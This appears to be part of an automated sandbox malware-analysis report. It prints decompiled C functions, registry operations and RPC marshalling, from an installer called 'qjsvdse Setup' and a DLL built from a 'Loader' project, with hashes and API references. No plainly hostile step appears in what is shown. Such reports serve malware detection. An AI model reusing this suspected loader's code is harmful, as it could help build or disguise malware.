						_t187 = _t187 + 0xc;
						if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
							0x6f1d0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
							_t187 = _t187 + 8;
						}
					} while (0 != 0);
					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 4)) = _v8;
				}
				return 0;
			}












                                                                                              0x6f1d47e5
                                                                                              0x6f1d47f6
                                                                                              0x6f1d4808
                                                                                              0x6f1d480b
                                                                                              0x6f1d4828
                                                                                              0x6f1d4839
                                                                                              0x6f1d484b
                                                                                              0x6f1d484f
                                                                                              0x6f1d4854
                                                                                              0x6f1d4860
                                                                                              0x6f1d48ce
                                                                                              0x6f1d48d3
                                                                                              0x6f1d4862
                                                                                              0x6f1d486b
                                                                                              0x6f1d4870
                                                                                              0x6f1d487f
                                                                                              0x6f1d4882
                                                                                              0x6f1d4889
                                                                                              0x6f1d4891
                                                                                              0x6f1d489d
                                                                                              0x6f1d48a0
                                                                                              0x6f1d48a3
                                                                                              0x6f1d48a3
                                                                                              0x6f1d48b3
                                                                                              0x6f1d48b8
                                                                                              0x6f1d48b8
                                                                                              0x6f1d48dc
                                                                                              0x6f1d48e6
                                                                                              0x6f1d48e6
                                                                                              0x6f1d48f0
                                                                                              0x6f1d4903
                                                                                              0x6f1d4911
                                                                                              0x6f1d4916
                                                                                              0x6f1d4916
                                                                                              0x6f1d4942
                                                                                              0x6f1d4949
                                                                                              0x6f1d494b
                                                                                              0x6f1d4966
                                                                                              0x6f1d496b
                                                                                              0x6f1d4982
                                                                                              0x6f1d49a0
                                                                                              0x6f1d49a5
                                                                                              0x6f1d49a5
                                                                                              0x6f1d49a8
                                                                                              0x6f1d49b5
                                                                                              0x6f1d49be
                                                                                              0x6f1d49be
                                                                                              0x6f1d49c6

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p,%p,%p,%d)$buffer overflow %d bytes$buffer=%d/%d$index=%d
                                                                                              • API String ID: 2102423945-3620127348
                                                                                              • Opcode ID: 695b2f8741ebe04e656ac39a49d939df359a106a96810eed936e0e386fca122b
                                                                                              • Instruction ID: f7dd3bec86d8868c66ff564f472e6a9e9e6819e473c80a112ce86286e8a3b184
                                                                                              • Opcode Fuzzy Hash: 695b2f8741ebe04e656ac39a49d939df359a106a96810eed936e0e386fca122b
                                                                                              • Instruction Fuzzy Hash: 28711EB5A00208AFDB04CF58C890EAA7BB5FF88398F14C159FD499B345D731EA51CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1D8700, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 16%
                                                                                              			E6F1D8700(void* __ecx, intOrPtr _a4, intOrPtr* _a8, signed char* _a12) {
				intOrPtr _v8;
				signed char* _t58;
				void* _t61;
				void* _t62;

				0x6f1d0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff, __ecx);
				_t62 = _t61 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x30) {
					0x6f1d0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					_t62 = _t62 + 8;
					 *0x6f1d0000(0x6e6);
				}
				0x6f1d0000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
					__eflags = 1;
					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x10)) + ( *(_a12 + (1 << 1)) & 0x000000ff) * 4));
				} else {
					_t58 = _a12;
					_t66 = _t58[1] & 0x80;
					if((_t58[1] & 0x80) == 0) {
						E6F1D2310(__eflags, _a4, _a8, 0);
					} else {
						E6F1D2310(_t66, _a4,  *_a8, 0);
					}
				}
				return 0;
			}







                                                                                              0x6f1d8718
                                                                                              0x6f1d871d
                                                                                              0x6f1d8729
                                                                                              0x6f1d8737
                                                                                              0x6f1d873c
                                                                                              0x6f1d8744
                                                                                              0x6f1d8744
                                                                                              0x6f1d875f
                                                                                              0x6f1d8770
                                                                                              0x6f1d87b7
                                                                                              0x6f1d87c6
                                                                                              0x6f1d8772
                                                                                              0x6f1d877a
                                                                                              0x6f1d8781
                                                                                              0x6f1d8786
                                                                                              0x6f1d87a5
                                                                                              0x6f1d8788
                                                                                              0x6f1d8794
                                                                                              0x6f1d8794
                                                                                              0x6f1d87aa
                                                                                              0x6f1d87ce

                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F1D8794
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F1D87A5
                                                                                              Strings
                                                                                              • flags: 0x%02x, xrefs: 6F1D875A
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F1D8713
                                                                                              • invalid format type %x, xrefs: 6F1D8732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: d90d62f3cdc12323e9f0d302e9af9c61135108cac8abaddac9f74ba053a9e364
                                                                                              • Instruction ID: 84ebea42c3875c4e45dd22d5b56e6fe98a8c73147be488416ba88be2dc7ecb3f
                                                                                              • Opcode Fuzzy Hash: d90d62f3cdc12323e9f0d302e9af9c61135108cac8abaddac9f74ba053a9e364
                                                                                              • Instruction Fuzzy Hash: 1F2195B5608294ABD704CF58C890FAA37B5BB89391F10C599FC648B3C5D635E920CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040373D, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040373D(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004058A2(__ecx, "1033");
				while(1) {
					_t26 =  *0x42eba4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42eb70; // 0x654160
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42eba0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e340 = _t18[1];
					 *0x42ec08 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e33c = _t23;
						E00405889(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "qjsvdse Setup", 0xfffffffe));
						_t11 =  *0x42eb8c; // 0x1
						_t27 =  *0x42eb88; // 0x65430c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x654324
								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                                              0x00403741
                                                                                              0x00403746
                                                                                              0x0040374c
                                                                                              0x00403751
                                                                                              0x00403751
                                                                                              0x00403759
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040375b
                                                                                              0x00403761
                                                                                              0x00403769
                                                                                              0x0040376b
                                                                                              0x00403771
                                                                                              0x00403771
                                                                                              0x00403773
                                                                                              0x0040377f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403783
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403785
                                                                                              0x0040378a
                                                                                              0x00403793
                                                                                              0x00403799
                                                                                              0x0040379e
                                                                                              0x004037b2
                                                                                              0x004037bd
                                                                                              0x004037d5
                                                                                              0x004037db
                                                                                              0x004037e0
                                                                                              0x004037e8
                                                                                              0x00403809
                                                                                              0x00403809
                                                                                              0x00403809
                                                                                              0x004037ea
                                                                                              0x004037ec
                                                                                              0x004037ec
                                                                                              0x004037f0
                                                                                              0x004037f3
                                                                                              0x004037f7
                                                                                              0x004037f7
                                                                                              0x004037fc
                                                                                              0x00403802
                                                                                              0x00403802
                                                                                              0x00000000
                                                                                              0x004037ec
                                                                                              0x004037a0
                                                                                              0x004037a5
                                                                                              0x004037ae
                                                                                              0x004037a7
                                                                                              0x004037a7
                                                                                              0x004037a7
                                                                                              0x004037a5

                                                                                              APIs
                                                                                              • SetWindowTextA.USER32(00000000,qjsvdse Setup), ref: 004037D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$`Ae$qjsvdse Setup
                                                                                              • API String ID: 530164218-2365723798
                                                                                              • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                              • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                                                                              • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                                                                              • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x42ec10; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a378) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a378 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
				return 0;
			}











                                                                                              0x004022f6
                                                                                              0x004022fb
                                                                                              0x00402305
                                                                                              0x0040230f
                                                                                              0x00402312
                                                                                              0x0040231c
                                                                                              0x0040232c
                                                                                              0x00402333
                                                                                              0x0040233b
                                                                                              0x00402349
                                                                                              0x0040234d
                                                                                              0x00402358
                                                                                              0x00402358
                                                                                              0x0040235c
                                                                                              0x00402360
                                                                                              0x00402366
                                                                                              0x0040236b
                                                                                              0x0040236b
                                                                                              0x0040236f
                                                                                              0x0040237b
                                                                                              0x0040237b
                                                                                              0x00402394
                                                                                              0x00402396
                                                                                              0x00402396
                                                                                              0x00402399
                                                                                              0x0040246f
                                                                                              0x0040246f
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nswBB9.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nswBB9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nswBB9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nswBB9.tmp
                                                                                              • API String ID: 1356686001-1646629439
                                                                                              • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                              • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                                                                              • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                                                                              • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 84%
                                                                                              			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec10; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405C49(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec10; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec10, 0);
				}
				return _t18;
			}










                                                                                              0x00402a38
                                                                                              0x00402a49
                                                                                              0x00402a51
                                                                                              0x00402a79
                                                                                              0x00402a60
                                                                                              0x00402a63
                                                                                              0x00402ab3
                                                                                              0x00402ab9
                                                                                              0x00402abb
                                                                                              0x00000000
                                                                                              0x00402abb
                                                                                              0x00402a70
                                                                                              0x00402a75
                                                                                              0x00402a77
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402a77
                                                                                              0x00402a8e
                                                                                              0x00402a96
                                                                                              0x00402a9d
                                                                                              0x00402ac3
                                                                                              0x00402ac9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402ad1
                                                                                              0x00402ad7
                                                                                              0x00402ad9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402ad9
                                                                                              0x00000000
                                                                                              0x00402aac
                                                                                              0x00402ac0

                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                              • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                                                                              • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                                                                              • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                              0x00401ccb
                                                                                              0x00401cd2
                                                                                              0x00401d01
                                                                                              0x00401d09
                                                                                              0x00401d10
                                                                                              0x00401d10
                                                                                              0x00402880
                                                                                              0x0040288c

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                              • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                                                                              • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                                                                              • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1DD830, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 245COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 49%
                                                                                              			E6F1DD830(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;

				_v28 = _a4 & 0x000000ff;
				_v28 = _v28 - 0x1b;
				if(_v28 > 0xa) {
					L57:
					0x6f1d0000("unknown array format 0x%x\n", _a4 & 0x000000ff);
					return  *0x6f1d0000(0x6f7);
				}
				_t7 = _v28 + 0x6f1dde1c; // 0xcccccc03
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6F1DDE08))) {
					case 0:
						_v12 =  *((intOrPtr*)(_a16 + 2));
						_v5 = ( *(_a16 + (1 << 0)) & 0x000000ff) + 1;
						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						_v16 = _v24;
						_a16 = E6F1DA440(_a8, _a16 + 4);
						E6F1D73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
						_t298 = _t294 + 0x18;
						if((_a28 & 0x000000ff) == 0) {
							L11:
							return _v16;
						} else {
							if((_a20 & 0x000000ff) == 0) {
								__eflags = _a24 & 0x000000ff;
								if((_a24 & 0x000000ff) != 0) {
									_t250 = _a8;
									__eflags =  *(_t250 + 0x20) & 0x000000ff;
									if(( *(_t250 + 0x20) & 0x000000ff) == 0) {
										__eflags =  *_a12;
										if( *_a12 == 0) {
											 *_a12 =  *(_a8 + 4);
										}
									}
								}
							} else {
								_t252 = E6F1DA3B0(_v24, _a8, _v24);
								_t298 = _t298 + 8;
								 *_a12 = _t252;
							}
							_v20 =  *(_a8 + 4);
							E6F1DAF00(_a8, _v16);
							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
							E6F1DC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
							_push( *_a12);
							_push(_v20);
							_push("copying %p to %p\n");
							0x6f1d0000();
							if( *_a12 != _v20) {
								E6F1E00E0( *_a12, _v20, _v16);
							}
							goto L11;
						}
					case 1:
						__eax = _a16;
						__cx =  *((intOrPtr*)(__eax + 2));
						_v12 =  *((intOrPtr*)(__eax + 2));
						1 = 1 << 0;
						__eax = _a16;
						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __cl;
						_a16 = _a16 + 4;
						__eax = _a8;
						_a16 = E6F1DA440(_a8, _a16 + 4);
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _a16;
						__ecx = _a8;
						_a16 = E6F1DA540(__ecx, __ecx, _a16,  *(_a8 + 0x3c));
						__edx = _v5 & 0x000000ff;
						_a8 = _a8 + 4;
						__eax = E6F1D73D0(__ecx, _a8 + 4, _v5 & 0x000000ff);
						__ecx = _a8;
						__edx =  *(_a8 + 0x44);
						__eax = _v12 & 0x0000ffff;
						_v16 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if((_a28 & 0x000000ff) != 0) {
							__edx = _a8;
							__eax =  *(__edx + 0x40);
							_v40 =  *(__edx + 0x40);
							__ecx = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) == 0) {
								__edx = _a12;
								__eflags =  *_a12;
								if( *_a12 == 0) {
									_a20 = 1;
								}
							}
							__eax = _a20 & 0x000000ff;
							__eflags = _a20 & 0x000000ff;
							if((_a20 & 0x000000ff) != 0) {
								__ecx = _v24;
								__edx = _a8;
								__eax = E6F1DA3B0(_v24, _a8, _v24);
								__ecx = _a12;
								 *_a12 = __eax;
							}
							__edx = _a8;
							__eax =  *(__edx + 4);
							_v20 =  *(__edx + 4);
							__ecx = _v16;
							__edx = _a8;
							E6F1DAF00(_a8, _v16) = _a8;
							__ecx = _v20;
							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
							__edx = _a20 & 0x000000ff;
							__eax = _a16;
							__ecx = _a12;
							__edx =  *_a12;
							__eax = _v20;
							__ecx = _a8;
							__eax = E6F1DC2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
							__edx = _v16;
							__eax = _v20;
							__ecx = _a12;
							 *_a12 =  *_a12 + _v40;
							__eflags =  *_a12 + _v40;
							__eax = E6F1E00E0( *_a12 + _v40, _v20, _v16);
						}
						__eax = _v16;
						return _v16;
					case 2:
						1 = 1 << 0;
						__eax = _a16;
						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
						_v5 = __cl;
						_a16 = _a16 + 4;
						__eax = _a8;
						_a16 = E6F1DA440(_a8, _a16 + 4);
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _a16;
						__ecx = _a8;
						_a16 = E6F1DA540(_a8, _a8, _a16,  *(_a8 + 0x3c));
						__edx = _a16;
						_push(_a16);
						__eax = _a8;
						_push(_a8);
						0x6f1d0000();
						__esp = __esp + 8;
						_v12 = __ax;
						__ecx = _a8;
						__edx =  *(_a8 + 0x3c);
						__eax = _v12 & 0x0000ffff;
						_v24 = E6F1DAEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
						__ecx = _a28 & 0x000000ff;
						__eflags = _a28 & 0x000000ff;
						if(__eflags == 0) {
							_push(0xab4);
							__eax = E6F1DFA34(__ebx, __edx, __edi, __esi, __eflags, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
						}
						__eax = _a20 & 0x000000ff;
						__eflags = _a20 & 0x000000ff;
						if((_a20 & 0x000000ff) == 0) {
							__ecx = _a12;
							__eflags =  *_a12;
							if( *_a12 == 0) {
								_a20 = 1;
							}
						}
						__edx = _a20 & 0x000000ff;
						__eflags = _a20 & 0x000000ff;
						if((_a20 & 0x000000ff) != 0) {
							__eax = _v24;
							__ecx = _a8;
							__eax = E6F1DA3B0(_a8, _a8, _v24);
							__edx = _a12;
							 *_a12 = __eax;
						}
						__eax = _v5 & 0x000000ff;
						__ecx = _a8;
						__ecx = _a8 + 4;
